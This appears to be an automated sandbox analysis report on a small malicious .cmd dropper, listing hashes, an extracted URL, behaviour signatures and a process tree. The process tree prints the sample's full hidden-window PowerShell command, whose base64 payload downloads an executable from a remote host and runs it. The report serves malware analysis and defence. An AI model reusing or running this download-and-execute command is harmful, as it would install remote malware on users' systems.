Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
25-01-2025 08:09
Static task
static1
Behavioral task
behavioral1
Sample
1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321.cmd
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321.cmd
Resource
win10v2004-20241007-en
General
-
Target
1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321.cmd
-
Size
400B
-
MD5
2eeefd9c6e45d4aa21861b1296f67585
-
SHA1
a946bbc6ddecbfc98e418f5cd268fd9e31012f21
-
SHA256
1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321
-
SHA512
ae169104fd73052c11deadc0b3470e6a64e53edc17818e75576c0077eef27a7633c6c94ea96f9ebfe4321f6184d448dd9b218aee35e6ffea40a446308af844e0
Malware Config
Extracted
https://biteblob.com/Download/J4wO2GduKNJmX3/build.exe
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2324 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2324 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2324 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2084 wrote to memory of 2324 2084 cmd.exe 31 PID 2084 wrote to memory of 2324 2084 cmd.exe 31 PID 2084 wrote to memory of 2324 2084 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1360212e053f0c7cfad357be61c1e591e4b35842c020279f08b3590705cc1321.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -WindowStyle Hidden -Command "Invoke-Expression ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JHVybCA9ICJodHRwczovL2JpdGVibG9iLmNvbS9Eb3dubG9hZC9KNHdPMkdkdUtOSm1YMy9idWlsZC5leGUiCiRmaWxlID0gIiRlbnY6VEVNUFxmaWxlLmV4ZSIKSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkdXJsIC1PdXRGaWxlICRmaWxlClN0YXJ0LVByb2Nlc3MgIiRlbnY6VEVNUFxmaWxlLmV4ZSI=')))"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2324
-